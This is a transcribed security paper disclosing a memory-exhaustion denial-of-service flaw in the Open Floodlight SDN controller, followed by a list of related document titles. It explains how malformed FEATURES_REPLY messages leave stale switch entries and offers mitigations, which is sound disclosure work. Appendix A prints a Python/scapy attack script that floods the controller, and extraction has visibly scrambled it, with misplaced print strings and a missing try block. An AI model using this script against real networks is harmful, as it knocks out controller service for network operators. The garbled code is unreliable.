A switch table vulnerability in the Open Floodlight SDN controller
|
|
|
- Annabel Blankenship
- 10 years ago
- Views:
Transcription
1 A switch table vulnerability in the Open Floodlight SDN controller Jeremy M. Dover Dover Networks LLC Open Floodlight is an open-source software-defined network controller, the brains of an OpenFlow-based network where the switches act as forwarding devices, leaving the controller to make decisions about flows and routing. In this paper we demonstrate a vulnerability in the OpenFlow interface of the Open Floodlight SDN controller which allows an attacker to overflow the internal data structures used for tracking the switches in the network and their ports. This overflow causes full CPU utilization, effectively denying controller functionality, and eventually crashes the Open Floodlight service. Introduction The recent explosion in interest in software-defined networking (SDN) has a number of vendors and open-source projects working hard to get their products into the marketspace. With this hurry comes significant concern that security may be left behind. There are numerous flavors of SDN in the market, but we are specifically interested in OpenFlow-enabled networks here. Figure 1: Schematic diagram of an OpenFlow-based network 1 As illustrated in Figure 1, an OpenFlow-based network has two major components: switches which provide the actual forwarding of traffic on the managed network, and a controller which makes all decisions for the switches about where packets and frames should be forwarded. (For those familiar with lightweight wireless network architectures, the setup is very similar.) OpenFlow switches operate in a similar manner to traditional switches, but more robustly: when a frame arrives on a port, the switch matches it against its flow table, and uses that to make a forwarding decision. 1 Image taken from 28 December 2013
2 Unlike traditional MAC address tables, a flow table entry records characteristics of a frame other than destination MAC address, including TCP and IP layer information; a Layer 3 switch provides a good comparison. The key difference between a traditional switched network and an OpenFlow network is when a switch encounters a new flow; rather than making a decision based on its own programming, the switch forwards a portion of the frame to the controller. The controller makes a forwarding decision for the flow, and pushes this information back to the switch, which installs this new instruction in its flow table. Thus additional frames/packets in the same flow do not need to be referenced to the controller, though flow table entries will eventually age out based on either lack of use or a hard timeout limit, if set by the controller when the flow is installed. Benton, et. al. (1) have investigated vulnerabilities inherent in the OpenFlow protocol, specifically denial of service attacks as well as integrity attacks against the switch flow tables. They also note that widespread lack of conformance to the OpenFlow standard s mandate for TLS protection of switchto-controller communications is a significant vulnerability. Open Floodlight (2) is a popular implementation of an OpenFlow controller, being both free to use and relatively easy to get up and running. Solomon, et. al. (3) have set up a test network with an Open Floodlight controller, managing a network of switches implemented with Open vswitch, a free OpenFlow-enabled switch that runs on a general purpose processor. In this network, the authors conduct a distributed denial of service (DDoS) attack against Open Floodlight with user machines on the managed network, cleverly stimulating the switches to send OpenFlow packet-in messages to the Open Floodlight controller that consume its resources. Our interest here is to analyze any performance- or security-related effects the processing of OpenFlow protocol units (either malformed or in unexpected contexts) can have on the Open Floodlight controller. The author (4) has previously published a Denial of Service attack against Open Floodlight that exploited an authentication failure of the controller to selectively deny service to individual switches in the network. Specifically we examine the effect that various OpenFlow messages have on populating Open Floodlight s internal switch and port tracking data structures. These data structures are primarily populated by two types of messages from the switch: FEATURES_REPLY and PORT_STATUS. FEATURES_REPLY messages are used in the OpenFlow application-level handshake, where the switch introduces its basic properties to the controller. PORT_STATUS messages can be used by the switch at any time to indicate the addition, modification, or deletion of ports to the controller. Because we are specifically interested in the OpenFlow protocol, we assume that the attack machine has access to the control network, rather than just access to the managed OpenFlow network. Other assumptions in this research: 1. The Open Floodlight controller we explored is the Floodlight VM Appliance, downloaded 19 December 2013 from We verified that this virtual appliance runs version 0.90 of the Open Floodlight code, which implements OpenFlow v1.0 (5). Other than providing a static IP address to the controller, no other configuration was performed on this VM. 2. We utilized Open vswitch switches to create our SDN network. It is possible that some of the information elements we study here are specific to the Open vswitch software, but we have tried to minimize its influence on this research.
3 3. Our attack machine has network access to the OpenFlow control network. Moreover, we assume the attacker has full control over the configuration of this machine, and can change this configuration during attack operations. The OpenFlow Messages As stated our interest here is in version 1.0 of the OpenFlow protocol. OpenFlow utilizes TCP for transport, specifically port Once the TCP session is established, the OpenFlow controller and switch conduct an application-layer handshake, as detailed in Table 1. After the handshake is complete, the channel is full duplex, and either switch or controller may send messages as needed. OpenFlow Switch OpenFlow Controller TCP Connect Port 6633 OF HELLO OF FEATURES_REPLY OF GET_CONFIG_REPLY OF STATS_REPLY OF HELLO OF FEATURES_REQUEST OF SET_CONFIG OF GET_CONFIG_REQUEST OF STATS_REQUEST OF FLOW_MOD Table 1: OpenFlow negotiation between controller and switch OpenFlow has 22 different types of messages, way too many to detail here. The key message for us to consider is the FEATURES_REPLY message. The FEATURES_REPLY message is sent by the switch at the request of the controller, which sends a FEATURES_REQUEST as part of the OpenFlow handshake. According to the OpenFlow v1.0 specification (5), the FEATURES_REPLY contains information about the switch, including its datapath_id (DPID, a unique identifier for the switch), and several other technical items. In the context of the handshake in Table 1, this is the first message in which the DPID appears, so it is used to define the switch within at least some of the controller s internal data structures. In addition this FEATURES_REPLY message should contain an array of ofp_phy_port structures that describe all the physical ports in the system that support OpenFlow. Each ofp_phy_port structure is a 48 byte description of the physical port on the switch. It includes a two-byte port number, a six-byte hardware (MAC) address, and a descriptive name of up to sixteen characters; in the protocol specification, the name is null-padded to sixteen characters. The remaining fields describe the features and state of the port, most of which are used to support the Spanning Tree Protocol (STP). Filling the Switch Table When an OpenFlow-enabled switch completes the handshake, the controller keeps a record of the switch and all of its ports. The easiest way to see this data is to query the controller s REST API, which is open by default without authentication on port 8080 of the controller, via the call /wm/core/controller/switches/json. A typical entry, in JSON format, contains the following information: (note that whitespace has been edited for readability)
4 { "actions":4095, "dpid":"00:00:6e:a9:fa:07:6f:49", "attributes":{"supportsofppflood":true, "FastWildcards": , "DescriptionData":{"length":1056, "manufacturerdescription":"nicira, Inc.", "hardwaredescription":"open vswitch", "softwaredescription":"1.9.3", "serialnumber":"none", "datapathdescription":"none"}, "supportsofpptable":true}, "role":null, "ports":[{"name":"br10", "state":1, "hardwareaddress":"6e:a9:fa:07:6f:49", "portnumber":65534, "config":1, "currentfeatures":0, "advertisedfeatures":0, "supportedfeatures":0, "peerfeatures":0}], "buffers":256, "connectedsince": , "capabilities":199, "tables":-1, "inetaddress":"/ :59164"} Much of the information in this record was populated by the original FEATURES_REPLY message from the switch, except: the inetaddress and connectedsince fields, populated based on the initial TCP connection from the switch; the role field, which is an Open Floodlight internal field describing master/slave roles in multi-controller scenarios; and the DescriptionData field, populated by the STATS_REPLY message in the handshake. The principal method by which this record can be modified is through PORT_STATUS messages, which can be used by the switch to add, modify, or delete ports from the switch. So if our goal is to overflow the switch table, theoretically one could connect to the controller, emulating a switch, and start adding fictional ports using PORT_STATUS messages. Two constraints make this attack infeasible. First, because the port number is a 16-bit integer a switch can only have different ports; we have verified that a PORT_STATUS message sent to add a new port with a duplicate port number replaces the old port information. While the controller CPU utilization does increase as the number of ports it is tracking increases, it does not cause any noticeable degradation of service. Second, as soon as the attacker disconnects from the controller, all of its associated ports are removed from the controller, meaning the switch quickly reverts to normal operation. Suppose we send another FEATURES_REPLY message after the handshake is complete, unsolicited by the controller. The natural choice is to send a normal FEATURES_REPLY message with a new port in the body. The controller is not happy at receiving an unsolicited FEATURES_REPLY, giving the following error in the log: T00:45: :00 localhost floodlight: ERROR [net.floodlightcontroller.core.internal.ofswitchimpl:new I/O server worker #1-2] Switch OFSwitchImpl [/ :35376 DPID[ab:cd:ee:ff:00:11:22:33]]: received unexpected featurereply
5 Moreover, the controller does not add the port from the second FEATURES_REPLY message to its tracking structures, leaving just the port from the original FEATURES_REPLY; this is verified by viewing the results of the /wm/core/controller/switches/json API call. However if we malform the second FEATURES_REPLY by changing the DPID to a new value, something interesting happens. The controller still is not happy, and logs the same received unexpected featurereply as before, but interestingly it reports this error with the new DPID, not the one from the original FEATURES_REPLY. Moreover, when making the /wm/core/controller/switches/json API call, the switch is listed with the new DPID, but the port associated with the switch is the port from the original FEATURES_REPLY, not the malformed one. The significance of this is that once our emulated switch disconnects, the switch entry is not removed from the switch table on the controller. In fact, the only way to remove this data appears to be to restart the controller service. This gives us the kernel of an attack. To implement the attack, we create a script that repeatedly connects to the controller, successfully completing the OpenFlow handshake, and then sending a FEATURES_REPLY with a different DPID. (Attack code is given in Appendix A.) As the script runs, it leaves a single entry in the switch table with every execution. Gradually more and more memory is consumed by the switch table, and more and more CPU time is taken up in garbage collection. Eventually, the controller becomes sufficiently brain-damaged that it cannot maintain connections to the existing switches, and we begin to see IO Error: Broken pipe errors in the controller logs, and at this point the controller is effectively disabled. But if we continue to press, we eventually crash the controller process, with log entries: T00:05: :00 localhost floodlight: # java.lang.outofmemoryerror: Java heap space T00:05: :00 localhost floodlight: # -XX:OnOutOfMemoryError="kill -9 %p" T00:05: :00 localhost floodlight: # Executing /bin/sh -c "kill "... This attack is not quick. Our virtual controller has 2 GB of RAM, and it took approximately 90 minutes for the attack script to crash the server, though service was effectively denied before that. However it is important to note that the attack is cumulative; as long as the controller is not restarted, entries left in the switch table using this vulnerability are never cleared out. It is possible to speed up the attack by using PORT_STATUS messages (namely port adds) to increases the amount of data left in the controller memory. Interestingly, it doesn t seem to matter whether the PORT_STATUS message come before or after the malformed FEATURES_REPLY message. Note however that there is no benefit in sending multiple malformed FEATURES_REPLY messages in a single session, since the net effect of such a message is to change the DPID in the switch table. Recommendations The vulnerability illustrated in this paper does not seem amenable to easy mitigation, other than by rigorously following the configuration guidance to isolate the OpenFlow control network so that no devices other than switches and controllers have interfaces on this network. One can monitor the /wm/core/controller/switches/json API results on a periodic basis, since these should only change with a network topology change.
6 For the developer, this should be a relatively easy fix; if a FEATURES_REPLY message is received out of turn, simply discard it. No OpenFlow compliant switch should send such messages except as part of the initial handshake, so there seems no legitimate reason to process them at all. About Dover Networks Dover Networks is a small firm focused on analytical cybersecurity; thoroughly grounded in the mechanics of cybersecurity, but with the value-add of thoughtful analysis, drawing from our decades of combined experience and expertise in cyber operations. Our personnel have experience in the full lifecycle of cyber operations: vulnerability research and development; software and systems engineering; integration and test; and operations support including targeting and training. Please check out our website for more information about our research, capabilities and engagement. Bibliography 1. Benton, Kevin, Camp, L. Jean, and Small, Chris. OpenFlow Vulnerability Assessment. [Online] [Cited: December 27, 2013.] 2. Project Floodlight. [Online] 3. Solomon, Nir, Francis, Yoav, and Eitan, Liahav. Floodlight OpenFlow DDoS. [Online] September [Cited: December 27, 2013.] 4. Dover, Jeremy M. Dover Networks Research Reports. [Online] December 30, [Cited: February 11, 2014.] pdf. 5. OpenFlow Switch Specification Version OpenFlow. [Online] [Cited: December 22, 2013.] 6. Biondi, Philippe. Scapy. [Online]
7 Appendix A: Attack code The following code is implemented in Python and uses an external library we have developed to implement the OpenFlow protocol in scapy. For brevity we ve omitted the library, but the protocol names are taken directly from the OpenFlow standard and should not present a problem to an implementer. #!/usr/bin/python import sys import time import socket import random from OFscapy import * # Scapy parameters conf.verb = False # Session parameters dip = sys.argv[1] dport = int(sys.argv[2]) port_id = "port" addr = "ee:ff:00:11:22:33" dpid = "ab:cd:" + addr # Craft the evil packet p = OpenFlow()/OFPT_FEATURES_REPLY(DPID=RandDPID())/OFP_PHY_PORT(port_no=65534, hw_addr=randmac(), portname="evilport", config=1, state=1) # Create the handshake packets once m1 = OpenFlow()/OFPT_HELLO() m2 = OpenFlow()/OFPT_FEATURES_REPLY(DPID = RandDPID(), n_buffers=256, capabilities = 199, actions = 4095)/OFP_PHY_PORT(port_no = 65534, hw_addr = addr, portname = port_id, config = 1, state = 1) m3 = OpenFlow()/OFPT_GET_CONFIG_REPLY(miss_send_len = 65535) m4 = OpenFlow()/OFPT_STATS_REPLY(statType=0)/OFP_DESC_STATS_REPLY(mfr_desc='Nicira, Inc', hw_desc='open vswitch', sw_desc='1.9.3', serial_num='none', dp_desc='none') while 1: # Try to make the connection to the server s = socket.socket(socket.af_inet,socket.sock_stream) s.connect((dip,dport)) ss = StreamSocket(s,Raw) print e[0] r0 = OpenFlow(s.recv(2048)) if type(r0.payload) is OFPT_HELLO: print "Received: else: r0.show() HELLO" # Send HELLO print "Sending: HELLO" m1.xid = r0.xid r = OpenFlow(ss.sr1(Raw(str(m1))).load) if type(r.payload) is OFPT_FEATURES_REQUEST: print "Received: else: print "Received: " r.show() FEATURES_REQUEST" # Sending FEATURES_REPLY
8 print "Sending: FEATURES_REPLY" m2.xid = r0.xid r2 = OpenFlow(ss.sr1(Raw(str(m2))).load) r3 = OpenFlow(r2.payload.payload.load) r4 = OpenFlow(r3.payload.payload.load) if (type(r2.payload) is OFPT_SET_CONFIG) and (type(r3.payload) is OFPT_GET_CONFIG_REQUEST) and (type(r4.payload) is OFPT_STATS_REQUEST): print "Continued: handshake" else: print "Received: " r2.show() except AttributeError,e: # Probably no big deal...might not have caught all three messages at the same time pass # Send GET_CONFIG_REPLY and STATS_REPLY # Note: we do not necessarily expect a reply after GET_CONFIG_REPLY print "Sending: GET_CONFIG_REPLY" ss.send(raw(str(m3))) print "Sending: STATS_REPLY" r4 = OpenFlow(ss.sr1(Raw(str(m4))).load) if (type(r4.payload) is OFPT_FLOW_MOD): print "Received: else: print "Received: " r4.show() FLOW_MOD" ## END HANDSHAKE ## Send the crafted packet print "Sending: craft packet " ss.send(raw(str(p)))
A denial of service attack against the Open Floodlight SDN controller
A denial of service attack against the Open Floodlight SDN controller Jeremy M. Dover Dover Networks LLC [email protected] Open Floodlight is an open-source software-defined network controller,
Software Defined Networking and OpenFlow: a Concise Review
Software Defined Networking and OpenFlow: a Concise Review Stefano Forti [email protected] MSc in Computer Science and Networking Scuola Superiore Sant'Anna - University of Pisa 1. Introduction
WHITE PAPER. SDN Controller Testing: Part 1
WHITE PAPER SDN Controller Testing: Part 1 www.ixiacom.com 915-0946-01 Rev. A, April 2014 2 Table of Contents Introduction... 4 Testing SDN... 5 Methodologies... 6 Testing OpenFlow Network Topology Discovery...
Project 4: SDNs Due: 11:59 PM, Dec 11, 2014
CS168 Computer Networks Fonseca Project 4: SDNs Due: 11:59 PM, Dec 11, 2014 Contents 1 Introduction 1 2 Overview 2 2.1 Components......................................... 2 3 Setup 3 4 Shortest-path Switching
Security Challenges & Opportunities in Software Defined Networks (SDN)
Security Challenges & Opportunities in Software Defined Networks (SDN) June 30 th, 2015 SEC2 2015 Premier atelier sur la sécurité dans les Clouds Nizar KHEIR Cyber Security Researcher Orange Labs Products
Securing Local Area Network with OpenFlow
Securing Local Area Network with OpenFlow Master s Thesis Presentation Fahad B. H. Chowdhury Supervisor: Professor Jukka Manner Advisor: Timo Kiravuo Department of Communications and Networking Aalto University
Network Security Demonstration - Snort based IDS Integration -
Network Security Demonstration - Snort based IDS Integration - Hyuk Lim ([email protected]) with TJ Ha, CW Jeong, J Narantuya, JW Kim Wireless Communications and Networking Lab School of Information and
The Lagopus SDN Software Switch. 3.1 SDN and OpenFlow. 3. Cloud Computing Technology
3. The Lagopus SDN Software Switch Here we explain the capabilities of the new Lagopus software switch in detail, starting with the basics of SDN and OpenFlow. 3.1 SDN and OpenFlow Those engaged in network-related
Software Defined Networking (SDN) OpenFlow and OpenStack. Vivek Dasgupta Principal Software Maintenance Engineer Red Hat
Software Defined Networking (SDN) OpenFlow and OpenStack Vivek Dasgupta Principal Software Maintenance Engineer Red Hat CONTENTS Introduction SDN and components SDN Architecture, Components SDN Controller
Understanding OpenFlow
Understanding OpenFlow Technical Whitepaper June, 2014 Saurabh Kumar Agarwal Email: [email protected] Abstract Technical overview of OpenFlow Switch Specification, Version 1.0.0, published on December
OpenFlow - the key standard of Software-Defined Networks. Dmitry Orekhov, Epam Systems
OpenFlow - the key standard of Software-Defined Networks Dmitry Orekhov, Epam Systems Software-defined network The Need for a New Network Architecture Limitations of Current Networking Technologies Changing
Software Defined Networking Security
Software Defined Networking Security Outline Introduction What is SDN? SDN attack surface Recent vulnerabilities Security response Defensive technologies Next steps Introduction Security nerd, recovering
Chapter 8 Security Pt 2
Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,
IxNetwork OpenFlow Solution
IxNetwork OpenFlow Solution Solution Highlights OpenFlow Controller Emulation OpenFlow Switch Emulation OpenFlow Benchmarking Test OpenFlow Switch Conformance Test Key Features Software Defined Networking
Firewalls with IPTables. Jason Healy, Director of Networks and Systems
Firewalls with IPTables Jason Healy, Director of Networks and Systems Last Updated Mar 18, 2008 2 Contents 1 Host-based Firewalls with IPTables 5 1.1 Introduction.............................. 5 1.2 Concepts...............................
Application Compatibility Best Practices for Remote Desktop Services
Application Compatibility Best Practices for Remote Desktop Services Introduction Remote Desktop Services in Windows Server 2008 R2 allows Windows Server to be accessed by multiple users concurrently to
How OpenFlow-based SDN can increase network security
How OpenFlow-based SDN can increase network security Charles Ferland, IBM System Networking Representing the ONF [email protected] +49 151 1265 0830 Important elements The objective is to build SDN networks
Procedure: You can find the problem sheet on Drive D: of the lab PCs. Part 1: Router & Switch
University of Jordan Faculty of Engineering & Technology Computer Engineering Department Computer Networks Laboratory 907528 Lab. 2 Network Devices & Packet Tracer Objectives 1. To become familiar with
OpenFlow: Concept and Practice. Dukhyun Chang ([email protected])
OpenFlow: Concept and Practice Dukhyun Chang ([email protected]) 1 Contents Software-Defined Networking (SDN) Overview of OpenFlow Experiment with OpenFlow 2/24 Software Defined Networking.. decoupling
Improving the Security and Efficiency of Network Clients Using OpenFlow
Improving the Security and Efficiency of Network Clients Using OpenFlow Adam Coxhead This report is submitted in partial fulfillment of the requirements for the degree of Bachelor of Computing and Mathematical
Designing Virtual Network Security Architectures Dave Shackleford
SESSION ID: CSV R03 Designing Virtual Network Security Architectures Dave Shackleford Sr. Faculty and Analyst SANS @daveshackleford Introduction Much has been said about virtual networking and softwaredefined
Outline. Institute of Computer and Communication Network Engineering. Institute of Computer and Communication Network Engineering
Institute of Computer and Communication Network Engineering Institute of Computer and Communication Network Engineering Communication Networks Software Defined Networking (SDN) Prof. Dr. Admela Jukan Dr.
PLUMgrid Toolbox: Tools to Install, Operate and Monitor Your Virtual Network Infrastructure
Toolbox: Tools to Install, Operate and Monitor Your Virtual Network Infrastructure Introduction The concept of Virtual Networking Infrastructure (VNI) is disrupting the networking space and is enabling
Dell OpenFlow Deployment and User Guide Dell Software-Defined Networking (SDN)
Dell OpenFlow Deployment and User Guide Dell Software-Defined Networking (SDN) Notes, Cautions, and Warnings NOTE: A NOTE indicates important information that helps you make better use of your computer.
Implementation of Address Learning/Packet Forwarding, Firewall and Load Balancing in Floodlight Controller for SDN Network Management
Research Paper Implementation of Address Learning/Packet Forwarding, Firewall and Load Balancing in Floodlight Controller for SDN Network Management Raphael Eweka MSc Student University of East London
Firewall Design Principles
Firewall Design Principles Software Engineering 4C03 Dr. Krishnan Stephen Woodall, April 6 th, 2004 Firewall Design Principles Stephen Woodall Introduction A network security domain is a contiguous region
OpenFlow: Load Balancing in enterprise networks using Floodlight Controller
OpenFlow: Load Balancing in enterprise networks using Floodlight Controller Srinivas Govindraj, Arunkumar Jayaraman, Nitin Khanna, Kaushik Ravi Prakash [email protected], [email protected],
Dell OpenFlow Deployment and User Guide 3.0 Dell Software-Defined Networking (SDN)
Dell OpenFlow Deployment and User Guide 3.0 Dell Software-Defined Networking (SDN) Notes, Cautions, and Warnings NOTE: A NOTE indicates important information that helps you make better use of your computer.
Voice Over IP (VoIP) Denial of Service (DoS)
Introduction Voice Over IP (VoIP) Denial of Service (DoS) By Mark Collier Chief Technology Officer SecureLogix Corporation [email protected] Denial of Service (DoS) is an issue for any IP network-based
A Fuzzy Logic-Based Information Security Management for Software-Defined Networks
A Fuzzy Logic-Based Information Security Management for Software-Defined Networks Sergei Dotcenko *, Andrei Vladyko *, Ivan Letenko * * The Bonch-Bruevich Saint-Petersburg State University of Telecommunications,
Open Source Network: Software-Defined Networking (SDN) and OpenFlow
Open Source Network: Software-Defined Networking (SDN) and OpenFlow Insop Song, Ericsson LinuxCon North America, Aug. 2012, San Diego CA Objectives Overview of OpenFlow Overview of Software Defined Networking
Current Trends of Topology Discovery in OpenFlow-based Software Defined Networks
1 Current Trends of Topology Discovery in OpenFlow-based Software Defined Networks Leonardo Ochoa-Aday, Cristina Cervello -Pastor, Member, IEEE, and Adriana Ferna ndez-ferna ndez Abstract The explosion
How To Protect A Dns Authority Server From A Flood Attack
the Availability Digest @availabilitydig Surviving DNS DDoS Attacks November 2013 DDoS attacks are on the rise. A DDoS attack launches a massive amount of traffic to a website to overwhelm it to the point
CrashPlan Security SECURITY CONTEXT TECHNOLOGY
TECHNICAL SPECIFICATIONS CrashPlan Security CrashPlan is a continuous, multi-destination solution engineered to back up mission-critical data whenever and wherever it is created. Because mobile laptops
1. Introduction. 2. DoS/DDoS. MilsVPN DoS/DDoS and ISP. 2.1 What is DoS/DDoS? 2.2 What is SYN Flooding?
Page 1 of 5 1. Introduction The present document explains about common attack scenarios to computer networks and describes with some examples the following features of the MilsGates: Protection against
Cloud Networking Disruption with Software Defined Network Virtualization. Ali Khayam
Cloud Networking Disruption with Software Defined Network Virtualization Ali Khayam In the next one hour Let s discuss two disruptive new paradigms in the world of networking: Network Virtualization Software
Denial Of Service. Types of attacks
Denial Of Service The goal of a denial of service attack is to deny legitimate users access to a particular resource. An incident is considered an attack if a malicious user intentionally disrupts service
CYBER ATTACKS EXPLAINED: PACKET CRAFTING
CYBER ATTACKS EXPLAINED: PACKET CRAFTING Protect your FOSS-based IT infrastructure from packet crafting by learning more about it. In the previous articles in this series, we explored common infrastructure
基 於 SDN 與 可 程 式 化 硬 體 架 構 之 雲 端 網 路 系 統 交 換 器
基 於 SDN 與 可 程 式 化 硬 體 架 構 之 雲 端 網 路 系 統 交 換 器 楊 竹 星 教 授 國 立 成 功 大 學 電 機 工 程 學 系 Outline Introduction OpenFlow NetFPGA OpenFlow Switch on NetFPGA Development Cases Conclusion 2 Introduction With the proposal
co Characterizing and Tracing Packet Floods Using Cisco R
co Characterizing and Tracing Packet Floods Using Cisco R Table of Contents Characterizing and Tracing Packet Floods Using Cisco Routers...1 Introduction...1 Before You Begin...1 Conventions...1 Prerequisites...1
A Comparative Study on Vega-HTTP & Popular Open-source Web-servers
A Comparative Study on Vega-HTTP & Popular Open-source Web-servers Happiest People. Happiest Customers Contents Abstract... 3 Introduction... 3 Performance Comparison... 4 Architecture... 5 Diagram...
Comparisons of SDN OpenFlow Controllers over EstiNet: Ryu vs. NOX
Comparisons of SDN OpenFlow Controllers over EstiNet: Ryu vs. NOX Shie-Yuan Wang Hung-Wei Chiu and Chih-Liang Chou Department of Computer Science, National Chiao Tung University, Taiwan Email: [email protected]
IP Monitoring and Filtering
IP Monitoring and Filtering By Gnanambal Chithambaram Sandeep Dubey Smrithi Barrenkula Subraja Krishnamurthy Sucheta P Kodali Abstract In our project IP Monitoring and filtering we developed a Java application
REAL-TIME WEB APPLICATION PROTECTION. AWF SERIES DATASHEET WEB APPLICATION FIREWALL
REAL-TIME WEB APPLICATION PROTECTION. AWF SERIES DATASHEET WEB APPLICATION FIREWALL AWF Series Web application firewalls provide industry-leading Web application attack protection, ensuring continuity
10 Key Things Your VoIP Firewall Should Do. When voice joins applications and data on your network
10 Key Things Your Firewall Should Do When voice joins applications and data on your network Table of Contents Making the Move to 3 10 Key Things 1 Security is More Than Physical 4 2 Priority Means Clarity
Concepts and Mechanisms for Consistent Route Transitions in Software-defined Networks
Institute of Parallel and Distributed Systems Department Distributed Systems University of Stuttgart Universitätsstraße 38 D-70569 Stuttgart Studienarbeit Nr. 2408 Concepts and Mechanisms for Consistent
MEASURING WORKLOAD PERFORMANCE IS THE INFRASTRUCTURE A PROBLEM?
MEASURING WORKLOAD PERFORMANCE IS THE INFRASTRUCTURE A PROBLEM? Ashutosh Shinde Performance Architect [email protected] Validating if the workload generated by the load generating tools is applied
HoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
SDN_CDN Documentation
SDN_CDN Documentation Release 0.1.1 introom9 October 27, 2015 Contents 1 What s it about 1 2 Get the code 3 3 Contents: 5 3.1 Overview................................................. 5 3.2 sdn_module................................................
Payment Card Industry (PCI) Terminal Software Security. Best Practices
Payment Card Industry (PCI) Terminal Software Security Best Version 1.0 December 2014 Document Changes Date Version Description June 2014 Draft Initial July 23, 2014 Core Redesign for core and other August
SDN CENTRALIZED NETWORK COMMAND AND CONTROL
SDN CENTRALIZED NETWORK COMMAND AND CONTROL Software Defined Networking (SDN) is a hot topic in the data center and cloud community. The geniuses over at IDC predict a $2 billion market by 2016
Solution of Exercise Sheet 5
Foundations of Cybersecurity (Winter 15/16) Prof. Dr. Michael Backes CISPA / Saarland University saarland university computer science Protocols = {????} Client Server IP Address =???? IP Address =????
Wedge Networks: Transparent Service Insertion in SDNs Using OpenFlow
Wedge Networks: EXECUTIVE SUMMARY In this paper, we will describe a novel way to insert Wedge Network s multiple content security services (such as Anti-Virus, Anti-Spam, Web Filtering, Data Loss Prevention,
Install Guide for JunosV Wireless LAN Controller
The next-generation Juniper Networks JunosV Wireless LAN Controller is a virtual controller using a cloud-based architecture with physical access points. The current functionality of a physical controller
Why ISPs need SDN: SDN-based Network Service Chaining and Software-defined Multicast
Why ISPs need SDN: SDN-based Network Chaining and Software-defined Multicast ZKI Herbsttagung, Kaiserslautern, Germany, 24. Sept. 2014 Jeremias Blendin, Julius Rückert, David Hausheer Department of Electrical
CSE331: Introduction to Networks and Security. Lecture 12 Fall 2006
CSE331: Introduction to Networks and Security Lecture 12 Fall 2006 Announcements Midterm I will be held Friday, Oct. 6th. True/False Multiple Choice Calculation Short answer Short essay Project 2 is on
DOMAIN NAME SECURITY EXTENSIONS
DOMAIN NAME SECURITY EXTENSIONS The aim of this paper is to provide information with regards to the current status of Domain Name System (DNS) and its evolution into Domain Name System Security Extensions
Software Defined Networking What is it, how does it work, and what is it good for?
Software Defined Networking What is it, how does it work, and what is it good for? slides stolen from Jennifer Rexford, Nick McKeown, Michael Schapira, Scott Shenker, Teemu Koponen, Yotam Harchol and David
Firewall Introduction Several Types of Firewall. Cisco PIX Firewall
Firewall Introduction Several Types of Firewall. Cisco PIX Firewall What is a Firewall? Non-computer industries: a wall that controls the spreading of a fire. Networks: a designed device that controls
VM-Series Firewall Deployment Tech Note PAN-OS 5.0
VM-Series Firewall Deployment Tech Note PAN-OS 5.0 Revision A 2012, Palo Alto Networks, Inc. www.paloaltonetworks.com Contents Overview... 3 Supported Topologies... 3 Prerequisites... 4 Licensing... 5
VMWARE Introduction ESX Server Architecture and the design of Virtual Machines
Introduction........................................................................................ 2 ESX Server Architecture and the design of Virtual Machines........................................
SOFTWARE ENGINEERING 4C03. Computer Networks & Computer Security. Network Firewall
SOFTWARE ENGINEERING 4C03 Computer Networks & Computer Security Network Firewall HAO WANG #0159386 Instructor: Dr. Kartik Krishnan Mar.29, 2004 Software Engineering Department of Computing and Software
AQA GCSE in Computer Science Computer Science Microsoft IT Academy Mapping
AQA GCSE in Computer Science Computer Science Microsoft IT Academy Mapping 3.1.1 Constants, variables and data types Understand what is mean by terms data and information Be able to describe the difference
Virtualization System Security
Virtualization System Security Bryan Williams, IBM X-Force Advanced Research Tom Cross, Manager, IBM X-Force Security Strategy 2009 IBM Corporation Overview Vulnerability disclosure analysis Vulnerability
Chapter 7 Configuring Trunk Groups and Dynamic Link Aggregation
Chapter 7 Configuring Trunk Groups and Dynamic Link Aggregation This chapter describes how to configure trunk groups and 802.3ad link aggregation. Trunk groups are manually-configured aggregate links containing
COMPSCI 314: SDN: Software Defined Networking
COMPSCI 314: SDN: Software Defined Networking Nevil Brownlee [email protected] Lecture 23 Current approach to building a network Buy 802.3 (Ethernet) switches, connect hosts to them using UTP cabling
Chapter 28 Denial of Service (DoS) Attack Prevention
Chapter 28 Denial of Service (DoS) Attack Prevention Introduction... 28-2 Overview of Denial of Service Attacks... 28-2 IP Options... 28-2 LAND Attack... 28-3 Ping of Death Attack... 28-4 Smurf Attack...
Overview. Securing TCP/IP. Introduction to TCP/IP (cont d) Introduction to TCP/IP
Overview Securing TCP/IP Chapter 6 TCP/IP Open Systems Interconnection Model Anatomy of a Packet Internet Protocol Security (IPSec) Web Security (HTTP over TLS, Secure-HTTP) Lecturer: Pei-yih Ting 1 2
Programmable Networking with Open vswitch
Programmable Networking with Open vswitch Jesse Gross LinuxCon September, 2013 2009 VMware Inc. All rights reserved Background: The Evolution of Data Centers Virtualization has created data center workloads
ZEN LOAD BALANCER EE v3.02 DATASHEET The Load Balancing made easy
ZEN LOAD BALANCER EE v3.02 DATASHEET The Load Balancing made easy OVERVIEW The global communication and the continuous growth of services provided through the Internet or local infrastructure require to
ZEN LOAD BALANCER EE v3.04 DATASHEET The Load Balancing made easy
ZEN LOAD BALANCER EE v3.04 DATASHEET The Load Balancing made easy OVERVIEW The global communication and the continuous growth of services provided through the Internet or local infrastructure require to
Software Defined Networking
Software Defined Networking Olaf Hagemann SE Director for DACH and HGM [email protected] SDN Drivers User, Device, App Mobility Cloud-Sourcing Consumerization of IT Silo d Workflows Dynamism
ON THE IMPLEMENTATION OF ADAPTIVE FLOW MEASUREMENT IN THE SDN-ENABLED NETWORK: A PROTOTYPE
ON THE IMPLEMENTATION OF ADAPTIVE FLOW MEASUREMENT IN THE SDN-ENABLED NETWORK: A PROTOTYPE PANG-WEI TSAI, CHUN-YU HSU, MON-YEN LUO AND CHU-SING YANG NATIONAL CHENG KUNG UNIVERSITY, INSTITUTE OF COMPUTER
Citrix XenServer Design: Designing XenServer Network Configurations
Citrix XenServer Design: Designing XenServer Network Configurations www.citrix.com Contents About... 5 Audience... 5 Purpose of the Guide... 6 Finding Configuration Instructions... 6 Visual Legend... 7
Testing Challenges for Modern Networks Built Using SDN and OpenFlow
